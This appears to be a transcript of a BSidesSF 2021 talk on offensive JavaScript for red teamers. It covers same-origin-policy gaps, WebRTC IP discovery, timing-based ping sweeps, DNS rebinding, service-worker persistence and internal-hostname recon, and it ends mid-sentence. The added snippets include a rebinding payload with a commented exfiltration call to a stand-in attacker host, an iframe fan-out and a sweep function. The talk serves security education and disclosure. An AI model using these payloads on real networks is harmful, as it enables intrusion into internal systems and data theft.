
BSidesSF 2021 - Offensive Javascript Techniques for Red Teamers (Dylan Ayrey • Christian Frichot)

BSidesSF · 2021 · 42:09 · 1.2K views · Published 2021-03 · Watch on YouTube ↗
Speakers: Dylan Ayrey, Christian Frichot
Tags:
Category: Technical
Team: Red
Style: Talk
About this talk
Dylan Ayrey, Christian Frichot - Offensive Javascript Techniques for Red Teamers (Or Anyone Really) (This is an updated version of a talk previously presented at BSidesSF 2019 -- https://www.youtube.com/watch?v=HfpnloZM61I) AppSec is often very heavily focused on pre-exploitation. Frameworks like BeEF break this norm a little and can be used as tools to move laterally from the browser, to implant malware on adjacent machines. Unfortunately, performing network reconnaissance with JavaScript becomes tricky if the victim doesn't keep the tab open for long. This presentation will discuss relatively new techniques and features of JavaScript that have made it easier for sophisticated threat actors to craft JavaScript payloads that target internal network vulnerabilities, as fast as a person can think to close a tab. We'll also show new reconnaissance techniques traditionally used by red teams, post-malware implant, that can be used to get a foothold onto a network from a browser, pre-malware implant. We'll also show some real examples of this, crafting external payloads that target internal assets at large companies, and we'll show how responsible disclosure for intranet facing bugs typically gets resolved.
Transcript [en]

G'day everyone. We're really happy to be able to present to you the presentation that we gave at BSidesSF back in 2019. Can everyone hear me with my funny rock and roll microphone? Test, test. Okay, cool. We thought we would take this opportunity to re-record bits and pieces of it and make it a little bit more slick. At a high level, what we want to do is shift this mindset of JavaScript being a language that people maybe don't think very highly of, and instead bring it into the realm of offensive security testers, red teamers, and bug bounty hunters. Let's do some intros.

My name's Dylan. I've worked at a number of large tech companies, I've open sourced a number of popular tools, and I've spoken at a number of large popular conferences, including DEF CON 2018 and DEF CON and Black Hat of 2020. My name is Christian Frichot. I recently moved back to Australia after spending a few years working up in the Bay Area for a couple of software companies and startups, and I currently work for HashiCorp remotely, doing product security style work. Before that, I was fortunate in that I got to contribute to some projects such as the Browser Exploitation Framework and the Browser Hacker's Handbook, published by Wiley. Okay, so first, a little bit of context.

In 2018, Christian and I originally gave this talk on stage at Kiwicon in front of a live audience, and we did something that I would consider fairly gross. I told Christian we really did not need to do it again for this talk, but despite my best efforts...

We have to get on to some actual content. This talk is about moving from JavaScript running in a web browser to a malware implant running on a server behind a private network, as quickly as possible. We're going to talk about how we can do that using some JavaScript APIs, including fetch, WebRTC, service workers, and a couple of others, and we're going to augment it with some red team reconnaissance techniques to make it as efficient and quick as possible. And of course we can't forget all the other JavaScript features, such as MathML, SVG, canvas, the IndexedDB API, the File API, the Media Capture API, WebSockets, web workers, the Geolocation API, the offline API, web notifications, WebGL, WebAssembly, WebUSB,

web pretty much everything. [ __ ] web browsers. One of the topics that we'll talk about a little bit later on is that actions can be performed cross-origin despite the controls browsers have in place with regards to the same-origin policy. Let's rewind the clock to the early 2000s. There used to be a time when an attacker could just directly and very easily find a vulnerability, like a SQL injection or remote code execution, that would give them access to the production database, and with it all of the user data, passwords, and payment information for all the different users in the system. Over time, defensive application security has gotten better in these regards, and it's a lot more difficult to find these types of vulnerabilities that take you directly to the juiciest data. But offensive techniques have also evolved.

Today, sophisticated malware frameworks can be used to pivot laterally through an environment. You may start an attack chain with a malware implant on a developer's laptop, kicked off by a spear-phishing campaign. That infected laptop can be used to compromise other internal servers, and because many services on the inside of company networks are less secured than the servers on the outside of a company's network, the attacker can use their arsenal of malware exploits to move from the original compromised laptop to an internal server, to another internal server, to another internal server, until eventually they get access to the same juicy data that they used to be able to reach through a single vulnerability. Through these post-exploitation malware frameworks, it's still very easy for an attacker to get access to the data they're looking for, and this remains an unsolved problem in the industry.

Today, most organizations suffer from a problem we've coined the lobster security fallacy; it's often called the Cadbury Creme Egg fallacy. The idea is that an organization's security controls are often hard on the outside and really, really soft and delicious on the inside. All of this really comes back to that initial foothold: how you can get access into a network, and how things like the prevalence of web browsers, their connectivity to multiple networks, and, you know, thousand-tab fatigue syndrome are all interesting avenues that someone with some malintent could take advantage of. The first item on the attacker's to-do list in these scenarios is making a user click a link, and there are many different ways this can occur. Over the last few years we've seen the prevalence of things like phishing and social engineering, random website compromises, watering-hole style attacks, all the way through to more complicated web application vulnerability related problems such as monster-in-the-middle style attacks or cross-site scripting and things like that.

Here's some interesting information from one of the Verizon data breach reports. If that initial malicious email contains a malware attachment, there's about a 12 percent chance of the user downloading that attachment and detonating it. But if that initial phishing email just contains a link that takes the victim to malicious JavaScript, there's about a 30 percent chance that the victim will click that link. So we really have to ask ourselves: just how bad can clicking a link be? We think it can potentially be quite bad. There are also some misconceptions around opening up links in incognito windows, and it's worth noting that all of the attacks that we're going to go over today can be performed in an incognito window just the same.

If we look at what a client-side, JavaScript-based attack flow might look like, you can start to lay out this pathway of escalating steps that can occur inside of the document object model: the user clicks a link; the bad website gets the user's internal IP address; the bad website then uses that information to try and sweep across that network, in spite of the same-origin policy; then the JavaScript tries to exploit some stuff based on the limited information that it may have. Looking at browsers in this way, as an attack surface, is really, really interesting, because if you think about it, your web browser is connected to probably at least three different networks at any one time. It'll be connecting to the local network, potentially through something like Wi-Fi; it might connect to the internet through Wi-Fi or through 4G or 5G; and it will also be able to access things like the loopback interface on the computer, or even on the phone itself. And let's not forget the potential for your mobile phone to roam from local network to local network to local network as you move around between your personal Wi-Fi at home or your corporate Wi-Fi at work.

A few times we've mentioned the same-origin policy, and we've mentioned it's not going to be an issue for us when jumping from a malicious website on the internet to an internal server. To understand why this is the case, let's jump into an example and see if we can wrap our heads around the same-origin policy. To start out, I'm running a local web server on the loopback interface, and I've browsed to a malicious website, evil.com. I've also pulled up the console here, so we can run JavaScript commands from the context of evil.com. We'll start with a simple example: I'll just send a POST request to evil.com, from evil.com, using the fetch API. It goes out without any issues. Next, I'll make it a little bit more interesting by reading the response, and again we can see we're able to read and log the response here without any issues.

Now, to make things a little more interesting, let's send a POST request to the web server that I have running locally. What's interesting here is that we do see an error after we send the POST request; there's a message here that talks about CORS. But if we check the server logs, we'll see that a POST request actually was sent to the server. Because HTTP requests are meant to be these really stateless, request-response, one-and-done transactions, from the web server's perspective it doesn't know which origin the request originated from; it just sees the POST request, and that's kind of the end of the story. But now the browser is throwing this funny error. If the request already went through, what's the error all about? Well, to understand that, let's try to read the response from the web server. Now, all of a sudden, when we try to read the response from the POST request, we're unable to. We can't log the response, and we get the same error that we got before. Let's try one more example: now I'll change the method from a POST request to a PUT request, and we'll try the same thing. Something really interesting happens in the server's logs: we no longer see that a PUT request went through; instead, we see that an OPTIONS request went through. That's not what we asked for; we asked for a PUT request. So what's going on here? Why is it that we're allowed to send some requests cross-origin but not allowed to send other requests, and what's the deal with being able to read responses?
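
As a rough sketch, this is roughly what that console demo is doing; 127.0.0.1:8000 here is a stand-in for whatever local server the demo actually uses:

    // A cross-origin POST with a "simple" body goes out without a preflight;
    // the server logs it even though the page can't read the reply.
    fetch('http://127.0.0.1:8000/', {
      method: 'POST',
      mode: 'no-cors',                       // send it, don't expect to read it
      body: new URLSearchParams({ a: '1' })  // form-encoded keeps it "simple"
    });

    // Trying to read the response cross-origin fails with a CORS error,
    // even though the server logs show the POST still arrived.
    fetch('http://127.0.0.1:8000/', { method: 'POST', body: 'x=1' })
      .then(r => r.text())
      .then(console.log)
      .catch(console.error);  // TypeError: Failed to fetch

    // A PUT is non-simple, so the browser preflights it: the server logs an
    // OPTIONS request, and the PUT never goes out unless CORS headers allow it.
    fetch('http://127.0.0.1:8000/', { method: 'PUT', body: 'x=1' })
      .catch(console.error);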

In the context of web browsers, the same-origin policy is one of the better controls that we have to constrain the execution environment of JavaScript in one tab from being able to interact with data from a different site or origin. You might have two tabs open, and obviously JavaScript in a Google tab should not be able to interact with an API, a service, or even JavaScript itself on a Facebook origin. At a very high level, requests are split into what we call simple HTTP requests and non-simple HTTP requests. A simple HTTP request might be something as simple as when you click submit on a form and that data gets posted to a URL; non-simple HTTP requests are kind of almost everything else. A good example would be if you wanted to use JavaScript to submit a request to an origin that included some custom HTTP request headers. What actually happens is that before the web browser submits the legitimate request, it sends an HTTP OPTIONS request to the target origin, to basically say: hey, do I have permission to perform this request? What that's actually doing is shifting the control to the target origin, letting it specify whether the browser may send the request and read the response. Understanding all of that helps us understand what the same-origin policy is, and you can already start to see that there are some ways we can jump from a malicious website to a local web server in spite of the same-origin policy's restrictions.

The differentiators between a simple HTTP request and a non-simple HTTP request can sometimes seem a little arbitrary; check out this resource from Mozilla to see the full breakdown. But at a high level, a GET request, or a POST request with no extra headers or anything modifying it outside of what a regular form post would be able to do, is a simple HTTP request, even if it's initiated from JavaScript. Some cross-origin requests can be used to exploit vulnerabilities; cross-site request forgery is a good example. In these instances you can actually submit the request, and you might not even care what response comes back; if that request is actioned on by the server, that might be good enough for you as the attacker to proceed with your chain of attack. That's why anti-CSRF tokens have become a very common control to protect against it. The other thing that the SOP doesn't really help too much with is DNS rebinding, which we'll cover a little bit more later.

Now, at a high level, the idea behind the same-origin policy was that it should be able to prevent and control data that can be sent from origin to origin, but given the nuance of how it actually works and how browsers work, there are always use cases. Even simple HTTP requests, such as requesting an image, will always go out without this preflight request, and what's interesting in those circumstances is that you're still effectively sending a cross-origin request, and even though you might not be able to get data back, it still leaks timing information. Most importantly for our purposes, these CSRF attacks and timing leaks can be used to jump from one network to another network, as was shown in our example, where we started on a website on the open internet and were able to send a POST request to a web server running on a private network, in this case the loopback interface. Really, though, it could be sent to any network that the device, whether it's a phone or a laptop, is currently connected to.

One of the concepts that we really liked was trying to think about cross-site request forgery through a different lens: instead of using it to target an individual and make them perform some action against their own personal account in some web application, we thought it's more interesting to think about it in the context of attacking infrastructure. Not just using CSRF attacks to attack users, but against bigger things that may sit behind those users within a corporate network. That's kind of one of the ideas behind BeEF: it was really about this beachhead of having a browser inside of a secure context and telling it to perform actions. When we start to look at exploiting cross-site request forgery in the context of an environment greater than just a user's web browser and their current authentication status to a web app, this starts to look really interesting, because now we've got the ability to send requests that potentially bypass network controls that may be in place, such as firewalls. You might be in an environment where a whole bunch of colleagues happen to be sitting on the same network, and potentially they're running local, insecure stuff on their developer workstations. As we touched on before with the lobster fallacy, it's very typical that your laptop or your computer, when it's in your corporate network, has access to servers and resources that definitely were not designed for or secured against the internet. It kind of comes back to that hard perimeter, soft on the inside. But once you get some control of any origin inside of a corporate network, you can potentially start interacting with these other servers on internal networks.

For those that haven't ever spent time using the Browser Exploitation Framework, this is a look at what the UI is when you start and log into BeEF. In this example I am hooking an Android mobile phone into the framework, and once it's hooked in, you'll see it appear on the left-hand side under the online browsers. If you click on a browser, the first thing you'll receive is all the information associated with that hooked browser context: the date stamp and the reported name of the browser, which may include the phone type. You can click through to the next page and potentially see some other information that's been somewhat passively acquired from that hooked browser origin. From the commands tree there are a bunch of different commands that you can execute, but the one that we're interested in is "Get internal IP with WebRTC".

A little bit of background on Web Real-Time Communications: the intent behind this technology was to provide a mechanism for browsers, in a cross-browser style method, to connect to each other and stream media or other data channels between each other. WebRTC had to implement some mechanisms to allow browsers to connect to each other, and part of that is effectively a protocol called ICE, the Interactive Connectivity Establishment protocol. For this to work, what actually had to happen was the browser had to query a local API to figure out what all the local IP addresses were. You might have a number of computers that are on a pretty local network, and for them to talk to each other directly, that communication doesn't even need to go out through the internet; for that to work, obviously, you have to be able to determine your local IP addresses.

Between the time Dylan and I first put this presentation together for Kiwicon and now, there have actually been some privacy-enhancing changes made to some of the mechanisms used by WebRTC inside modern browsers. The method that they've used to prevent the leakage of internal IP addresses has been fully implemented inside desktop browsers, but actually hasn't been implemented yet on mobile phones; I wouldn't be surprised if this change comes through pretty soon. Now, there are obviously other ways that same information can be gathered; it was just interesting to see how the needle of browser security controls moves over time. What actually happens now is that when Chrome, for instance, requests a local IP address, it interacts with a multicast DNS service inside the browser and effectively generates a randomly generated multicast address that the browser will answer for. So if anyone on the local network tries to discover where that computer is, the browser will actually respond to multicast DNS, which is quite an interesting future research topic.
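
Here's a minimal sketch of the classic ICE-candidate trick being described; on patched desktop browsers the gathered address will usually be the obfuscated mDNS .local name rather than a raw internal IP:

    // Create a throwaway peer connection and read local addresses out of
    // the ICE candidates that gathering produces.
    const pc = new RTCPeerConnection({ iceServers: [] });
    pc.createDataChannel('');            // any channel kicks off ICE gathering
    pc.onicecandidate = (e) => {
      if (!e.candidate) return;          // a null candidate means gathering is done
      // Candidate strings look like "candidate:... udp ... <address> <port> typ host";
      // the address is the fifth space-separated field. On modern desktop
      // browsers it's an mDNS name like "1f4a....local" instead of 192.168.x.x.
      console.log('local candidate address:', e.candidate.candidate.split(' ')[4]);
    };
    pc.createOffer().then((offer) => pc.setLocalDescription(offer));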

In this instance, you can see that the execution of this module has provided us with a 192.168 internal IP address, and this is quite interesting, because using that information we can actually use another module called ping sweep. We can feed it effectively a range of IP addresses associated with the starting point of that initial hooked browser inside the phone, and we can kick off a task that will get executed in that hooked browser. The ping sweep module is interesting in that it just tries to submit a cross-origin style request to the target IP address, and it then makes a kind of guess based on how long that initial request takes to either error out or potentially return some content. Using that information, it can give you a determination of whether or not a host is available at that IP address. So this is a really good example of JavaScript that's executing, sending requests out cross-origin, and due to the way that the SOP works, we can actually make assumptions based on the timing of data that may or may not come back.
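
A rough sketch of that timing idea (this is not BeEF's actual module; the thresholds and the /24 assumption are illustrative):

    // Fire a no-cors fetch at each candidate host and guess from how quickly
    // it settles whether something answered. A fast failure often means the
    // host is there (connection refused or an unreadable response); waiting
    // out the full timeout usually means nothing is listening at all.
    async function probe(ip, timeoutMs = 3000) {
      const ctl = new AbortController();
      const timer = setTimeout(() => ctl.abort(), timeoutMs);
      const started = performance.now();
      try {
        await fetch(`http://${ip}/`, { mode: 'no-cors', signal: ctl.signal });
        return { ip, up: true, ms: performance.now() - started };
      } catch (err) {
        const ms = performance.now() - started;
        return { ip, up: ms < timeoutMs - 100, ms }; // aborted = probably down
      } finally {
        clearTimeout(timer);
      }
    }

    // Sweep the /24 around the address WebRTC handed us.
    async function sweep(prefix /* e.g. '192.168.1' */) {
      for (let i = 1; i < 255; i++) {
        const r = await probe(`${prefix}.${i}`);
        if (r.up) console.log('possible host:', r.ip, Math.round(r.ms) + 'ms');
      }
    }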

Now, BeEF obviously has its challenges and limitations as well. A really good example: what if the victim closes their tab? At that point you potentially lose the JavaScript execution environment that maybe you were using to perform reconnaissance or perform exploitation of internal resources, and that's obviously not ideal. One of the things that we really wanted to figure out was: how bad can it be if you can gain arbitrary JavaScript execution on a single victim within a corporate network, and maybe you've only got about 60 seconds to execute as much as you possibly can?

There's one other type of vulnerability that we need to touch on really briefly in the context of attacking infrastructure, and that's cross-site scripting. Most people have heard of cross-site scripting, and the reason is that, according to HackerOne, it's the most popular web vulnerability. It's so popular that AppSec teams have, in my experience, grown a little bit numb to it. At a high level, cross-site scripting is basically gaining untrusted JavaScript execution on a trusted website; when an attacker can run JavaScript on an origin they shouldn't be able to run it on, that's cross-site scripting. Now, in its typical form it's used to attack other clients, but again, let's frame this in the context of being able to attack a server.

First, let's look at a quote from HackerOne. In this quote they heavily imply that stored cross-site scripting is generally more severe than reflected cross-site scripting. The difference is that stored cross-site scripting is when you manage to get one of these unsafe JavaScript payloads saved into a database, where it can later be read back out and executed in the user's browsing environment; reflected cross-site scripting is when the payload is in the URL. So you can see why some AppSec engineers may just assume that stored cross-site scripting is more severe, because it persists. But let's think about this from the perspective of a private network. Let's say I, an attacker, want to trigger cross-site scripting on a victim based on the fact that they have access to an internal service. I'll pick an example internal service, say Jenkins, and let's say the attacker has advance knowledge both that this victim is sitting on a network that has access to this Jenkins server, and that the attacker has obtained a reflected cross-site scripting bug for Jenkins. In this scenario, all the attacker needs to do is send a link to the victim; if clicked, it'll detonate the cross-site scripting from behind the private network, in the Jenkins environment. And because we're talking about Jenkins, that JavaScript will be able to interact with Jenkins in a way that gets arbitrary code execution on the server. Jenkins by design allows users to run arbitrary code, so being able to impersonate a user's JavaScript enables the attacker to run arbitrary code on the server. But what would this look like in the case of stored cross-site scripting? In that example, the attacker would need some way to get that payload saved into the database, and remember, they don't actually have direct access to this web app; it's behind a private network. So in this particular example of attacking infrastructure, reflected cross-site scripting is actually much more valuable to an attacker than stored cross-site scripting.

It's also kind of interesting that if we look up the historical vulnerability ratings for cross-site scripting in Jenkins, they've all been pretty low severity, as opposed to a remote code execution vulnerability, which might have a max 10-out-of-10 severity. This is interesting because cross-site scripting not only equates to remote code execution, but, through the browser's usage of multiple networks, can be leveraged in a way that gains the attacker that code execution even though they don't have direct access to the network. In that capacity, a reflected cross-site scripting in Jenkins can actually be more dangerous than certain types of remote code execution.

At this point you're probably wondering: okay, you might be able to construct these URLs with cross-site scripting in them and attack a company, if you knew what the internal hostnames were and you knew where people were running their Jenkins and things like that; but if you're trying to attack a company, you wouldn't know any of that stuff ahead of time, so how is any of this helpful? This is where some red team reconnaissance starts to enter the picture. We'll go over a few different tools that are going to be useful in figuring out what these internal hostnames are, but before we get into that, we need to pick a target company. Now, there's basically no way for us to do this without somebody getting a little bit mad at us, so: I'm sorry, Pinterest. It's worth noting that neither Christian nor myself have ever worked at this target company, and for no reason other than just needing an example, we decided to pick on Pinterest. There is nothing extra vulnerable about them; if anything, this is categorically an example Silicon Valley company that roughly matches what you would find running these same recon techniques on any other major company you can think of. To start things out, I'm going to show off a tool called RiskIQ.

RiskIQ uses a technique called passive DNS to collect a bunch of data and information on lots of different websites. The way passive DNS works is they have some sort of tap on internet infrastructure and they watch DNS queries fly over the wire; because DNS queries are not encrypted, they're able to see this data, collect it, and then use it for their product. We'll start just by searching for Pinterest. At this point we can see that there are a bunch of SSL certificates that RiskIQ has observed, and what's interesting here is that you can expand them and see all their different fields, and RiskIQ allows you to do reverse searches on all of the fields on the SSL certificate. So when we see that the organization name for this certificate is Pinterest, we can actually do a reverse search on that, and we can see every other SSL certificate that uses the name Pinterest for the organization name. This takes us to a domain called pinadmin; pinadmin, as it turns out, is one of the domains that Pinterest uses internally to host some of their internal tools. You might be thinking that they can just remove some information from their SSL certificates to make this a little bit harder to find, but the reality is this information actually leaks out in a number of different places.

One tried-and-true way that I like to find internal hostnames is through the company's mobile applications. Typically speaking, information leaks out in the mobile application because it's designed to function both on the internet and in an internal test environment, and so we can often find references to that test environment buried in the app. To uncover that, we can use an APK decompiler to get access to some of the raw Java class files that contain the information leaks we'd be looking for. After we've downloaded the decompiled Java code, we can just run some simple string greps, and sure enough, here again we can find a reference to pinadmin. Another simple way we can get access to this hostname is to just head over to Pinterest's GitHub and search their organization; we can again find dozens of references to pinadmin scattered throughout their open source code.

Lastly, there's a tool called CertGraph, and I've invited Ian Foster, the author of CertGraph, to show off how the tool works and how it can help us find more domains. CertGraph is an open source intelligence tool to enumerate related domain names by drawing the graph of publicly trusted certificate alt names. There are many sources it can pull data from, but by far the richest is Certificate Transparency. Certificate Transparency is a publicly auditable log of all trusted SSL certificates, including internal SSL certificates and internal domain names. CertGraph works by finding all the certificates for a provided domain name, finding all the alt-name domains listed in those certificates, getting all of their certificates, and iterating appropriately. This allows CertGraph to find lots of related domain names and subdomain names shared by the same entity that would otherwise be hidden. For example, this can help enumerate domains like pinadmin.com from pinterest.com if they share an SSL certificate, or even if any chain of domain names and certificates is shared between them. Using Dylan's example, if you run CertGraph on pinadmin.com, it reveals many other subdomain names of pinadmin.com, as well as pin220.com, which looks like another interesting domain that might be worth looking at.

There are a number of other tools that can be used to find internal domain names, but let's shift our focus and look for subdomains at this point. One popular tool I like using for this is Sublist3r. Sublist3r will actually use a whole bunch of other tools to find subdomains, which includes searching VirusTotal for samples that people may have uploaded, Google dorking, Certificate Transparency, and a number of other things. Using this, we can find more than 200 internal subdomains of pinadmin. With this information, there's one other type of attack that we briefly mentioned earlier, and that's DNS rebinding. DNS rebinding, in the context of a browser, is another way to kind of skirt the same-origin policy.

If we look at the simplest definition of an origin, it's the protocol, the domain, and the port. Notably, the server's IP address is not a consideration when defining an origin. This means that when the browser is doing DNS resolutions to obtain an IP address, if it performs a second DNS resolution on the same host and the IP address changes, the browser will consider it the same origin even though it's a different IP address. Let's think about this from the perspective of a malicious website. You may browse to a malicious website which resolves to a public IP address that belongs to an attacker; then the attacker might try to use the fetch API to have your browser make a request to their domain. However, if the second resolution no longer points to a public IP address, but instead points to an internal IP address, the attacker has orchestrated a way to force a victim to send a request to an internal IP address while the browser still thinks it's talking to the same origin. And because it thinks it's talking to the same origin, all the rules that we mentioned about simple and non-simple HTTP requests go out the window, and the attacker is freely able to make requests and view responses from whatever web server happens to be on the other side of that IP address.

Likewise, we can do something similar with a CNAME rebind. Instead of rebinding to an IP address, we can rebind to a CNAME, and by doing this we can just CNAME to one of the hosts that we found in the previous enumeration. This then enables an attacker to load a malicious webpage, have a victim go to that malicious webpage, and the JavaScript on that page is now free to send requests to internal hosts that the attacker doesn't otherwise have access to, view the responses, and proxy them back out to the attacker. The attacker can then use the victim's web browser to effectively form a proxy between them and the internal network that the victim sits on, and view all the content that sits behind the private network that they can DNS rebind to.

There are a few limitations to this attack. First and foremost, the hosts that the attacker is targeting can't be running SSL. The reason is that the domain will not match the domain listed on the certificate, because the domain is still the attacker's domain; therefore, if you try to DNS rebind to an SSL website, the browser will just get certificate errors and the attack won't work. Another limitation is that some web servers, such as Django's, will actually do Host header validation specifically to prevent this type of attack: if the Django web server sees the malicious Host header instead of the Host header that the server is expecting, it'll just drop the request.
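
For reference, Django does this via its ALLOWED_HOSTS setting. Here's a minimal sketch of the same check in a plain Node HTTP server, with the hostnames as made-up example values; a DNS-rebound request still carries the attacker's domain in its Host header, which is what the check catches:

    // Drop any request whose Host header isn't one of ours; a rebound
    // request still names the attacker's domain in that header.
    const http = require('http');
    const ALLOWED_HOSTS = ['intranet.corp.example', 'localhost']; // stand-ins

    http.createServer((req, res) => {
      const host = (req.headers.host || '').split(':')[0]; // strip the port
      if (!ALLOWED_HOSTS.includes(host)) {
        res.writeHead(400);
        return res.end('Bad Host header');
      }
      res.end('hello');
    }).listen(8000);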

Additionally, if there are any cookies stored for the user, those cookies will not be sent through, because cookies are saved to domains, not to IP addresses. So, to frame this whole attack: you need an insecure web server internally that doesn't have authentication on it, and that's actually pretty common. I would almost wager to say common enough that if we were to rebind to all of the hostnames that we found in the enumeration step, we would almost certainly be able to exfiltrate some data that we shouldn't be able to. Here's another limitation: the DNS cache in a browser lasts about 60 seconds, so you need to keep a victim on the page for 60 seconds to be able to perform this attack. That does not mean that if you're targeting 200 domains you need to wait 60 seconds for each domain. Instead, we can get around this by creating 200 different iframes in the background, having each one of them point to a different malicious domain, and then at the end of the 60 seconds we rebind them all at the same time and steal all the content from each of the iframes.
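
A sketch of that fan-out; the wildcard rebinding domain here is a made-up stand-in for attacker infrastructure:

    // One hidden iframe per target, each on its own attacker-controlled
    // subdomain (t1.rebind.evil.example, t2..., and so on), so all 200
    // rebind clocks run in parallel instead of back to back.
    const targets = ['t1', 't2', 't3' /* ... ~200 of these */];
    for (const t of targets) {
      const frame = document.createElement('iframe');
      frame.style.display = 'none';
      frame.src = `http://${t}.rebind.evil.example/payload.html`;
      document.body.appendChild(frame);
    }
    // After ~60s, each frame's DNS record is repointed at a different internal
    // host; the payload in each frame re-fetches its own origin and sends
    // whatever it can read back out to the attacker.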

Let's look at a brief example of this. To frame the context, I've got two web servers running: one of them is running on the open internet, and one of them is running on loopback. Then I've got a secret file called secret.txt on the loopback web server; if you visit /secret.txt, you'll see that there's some secret text here that we don't want strangers on the internet to get. Okay, with that context, let's visit the website on the internet and take a look at the JavaScript to see what it's doing. We can see there's some very simple JavaScript here that's just polling the origin for the page every second, and remember, the IP address is not a part of the definition of an origin. When we check the server logs, we can see that the remote server is getting polled once a second. Now fast forward a little bit, 60 seconds, to when the DNS cache in the browser expires. When the browser does a second DNS lookup, instead of returning the public IP address again, it returns 127.0.0.1, the loopback interface. All of a sudden, this very simple JavaScript that's just polling window.origin jumps from the remote web server to our local web server, and if we look at the IP address in the logs, we can see the remote web server was seeing an IP address from the open internet, but the local web server sees the request coming from within the loopback interface. All of this allows the JavaScript, which was loaded from the remote untrusted server, to actually read the /secret.txt file on the local web server. Now, in this example I've just written it to the DOM, but you could imagine it being exfiltrated out to the malicious attacker at this point, and you can imagine how we can use this to basically skirt the same-origin policy.
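
Roughly what that demo payload looks like; the exfiltration endpoint at the end is hypothetical:

    // Poll our own origin once a second. Before the rebind this reaches the
    // attacker's public server; once the browser re-resolves the name to
    // 127.0.0.1, the exact same code reads the internal server instead,
    // because the origin (scheme + host + port) hasn't changed.
    setInterval(async () => {
      try {
        const res = await fetch('/secret.txt');   // same-origin, so readable
        const text = await res.text();
        document.body.textContent = text;         // the demo writes it to the DOM
        // A real attack would exfiltrate instead, e.g.:
        // navigator.sendBeacon('https://exfil.evil.example/', text);
      } catch (e) {
        // not rebound yet (or no such file); keep polling
      }
    }, 1000);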

Another browser technology that we have up our sleeves when operating in a short window of time is service workers. Service workers have been around in modern web browsers for a few years now, and the intent behind them was to allow web applications to continue functioning, to some degree, even while the computer or the browser is no longer connected to the network. This is implemented as something like a background JavaScript execution environment, and it's really quite interesting in that they often have the capability to continue functioning even after the tab is in fact closed. They have some constraints on how they operate: in general, service workers must operate over TLS, except if you're developing on localhost; they don't operate with mixed content; and they also function in a somewhat sandboxed environment with a limited subset of JavaScript. There has been some interesting research, though, performed by Claudio and Emanuel. They did some research for Kiwicon a few years ago and then also presented at DEF CON and Black Hat Arsenal, where they had used some tricks to coerce service workers to continue functioning, in some circumstances, for up to 30 minutes. And if you think about it, 30 minutes is definitely a long time to be able to execute arbitrary JavaScript.

I have a very simple service worker example here that's actually available on GitHub if you want to check it out. If we look at the source code, all we're doing is basically loading a very simple service worker that just polls localhost every second. You can see I have a web server running in the background here, and when I visit the website we'll see that polling kick off, with a request made every second. But then, when I close the tab, it doesn't stop: the polling continues. And so you can imagine using this to launch CSRF attacks against either loopback or SSL websites on internal networks, and being able to persist these types of attacks even after the tab gets closed.
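
A minimal sketch along the lines of that example (not its exact code); the worker can outlive the tab for a while, though browsers cap how long an idle worker keeps running:

    // page.js: register the worker (service workers need TLS, or localhost).
    if ('serviceWorker' in navigator) {
      navigator.serviceWorker.register('/sw.js');
    }

    // sw.js: keep poking localhost once a second, even after the tab closes,
    // for as long as the browser lets the worker live.
    setInterval(() => {
      fetch('http://localhost:8000/', { mode: 'no-cors' }).catch(() => {});
    }, 1000);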

With all of this context, let's go over a few real-world examples that I was able to identify using the techniques we've gone over so far, finding vulnerabilities in companies' internal infrastructure and reporting them through bug bounty programs. One example: using the reconnaissance techniques we talked about, I found a company that was running a piece of software called Review Board internally. Review Board is a piece of open source software designed for code review, so I was able to pull it down and run it locally, and I had access to the source code, which makes finding vulnerabilities a little bit easier. Because this is meant to run internally, it doesn't get the same amount of scrutiny that edge-facing apps would, and because cross-site scripting and cross-site request forgery are such common vulnerabilities, it wasn't difficult to find vulnerabilities in this application. When put together, I was able to construct a link that, if clicked, would use cross-site request forgery to install a stored cross-site scripting payload on the application; that stored cross-site scripting could then be used to steal all of the source code of the company. So, end to end, it's a link that, if clicked, steals all the company's source code, even though I didn't have access to Review Board. When I disclosed this vulnerability, the company decided that because they didn't write the code for Review Board, they weren't going to pay for it. I notified the maintainers of Review Board about the vulnerabilities, they got it patched, and they credited me in the release notes.

Here's another example. There's another open source tool called GoCD; this is a DevOps tool that configures environments internally. I used the same formula as before: I pulled it down, I ran it locally, and I took a look. By default the application has no authentication, and that's an easier thing to exploit from an attacker's standpoint, because it means anyone on the network can click the link, and the victim doesn't have to be authenticated to the app to be able to trigger CSRF attacks. I found that for the most part the application actually used CSRF tokens to protect against CSRF, but there was one endpoint, for creating environments, that did not have CSRF protection. In this case I actually knew the person running the bug bounty, and I reached out to them ahead of time and asked if this was worth submitting. They mentioned something similar to the first example: because they didn't write this code, and because it's not in the scope of the bug bounty, it would not be worth submitting. And so I didn't.

Here's one more example, and it follows the same formula. I found that a company was running a piece of software called GlobalSight internally. GlobalSight is an open source piece of software that I was able to pull off SourceForge, run locally, and look at the source code for. I was able to find a lot of vulnerabilities in this application, and among them were a reflected cross-site scripting and a remote code execution vulnerability that was due to being able to upload a web shell to a file upload endpoint. When combined, I now have a link where, if someone clicks it, the reflected cross-site scripting can be used to upload the web shell and detonate its payload, and now we've gained shell access to a web server that we otherwise have no direct access to. When I submitted this vulnerability, this company treated it differently than the first two companies did: they recognized the security impact to their organization and decided to pay out for the vulnerabilities. I also worked with the upstream vendor in this case to get it patched. Hopefully this demonstrates how easy this formula is for constructing URLs that can cause some pretty nasty damage inside of companies' networks.

Let's back up now and take the 10,000-foot view of all the different things we've talked about so far. Our main goal here is to see what's possible just through clicking a link and keeping a victim on a page for 60 seconds.

So let's walk through a user story and see what that could look like, covering all the different things we've talked about. The first thing we're able to do is grab the user's internal IP address using the WebRTC API; we'll assume this phishing email was clicked via a mobile phone, making this attack possible. Using this IP address, we're able to immediately begin a timing-based attack, searching other IP addresses within the same CIDR range for potential services that might be running on those hosts. In parallel with that, we can kick off a service worker that's able to run for many minutes in the background, even after the victim has closed the tab. That service worker is then allowed to send cross-origin requests to all the HTTPS websites that we've been able to identify through our enumeration and reconnaissance step. This could include any CSRF attacks that we may have against these hosts, and we can interrogate them to see which ones are still active, again through timing leaks. Additionally, any cross-site scripting attacks that we were able to construct ahead of time, based on the recon we've done against the company, we can launch as well. We might have to be a little bit sneaky about them, but usually we can get away with it by either iframing the reflected cross-site scripting payload in an invisible iframe, launching a pop-up, or sticking it in another tab. While all that's going on, our DNS rebind clock has also started, and what we're able to do there is iframe malicious domains for all of the hosts we were able to identify from the ping sweep, as well as CNAME rebinds for all the hosts we were able to identify from our enumeration step, as long as they don't have SSL. In 60 seconds we'll be able to grab all of the content from all of those different hosts and proxy it back to the attacker, also priming the attacker for subsequent requests against those hosts. In concert, what we end up with is several avenues both to steal data and to install backdoors into internal infrastructure. We also have several different avenues for persistence, including persistence in the victim's web browser through the use of service workers, and persistence on the servers that 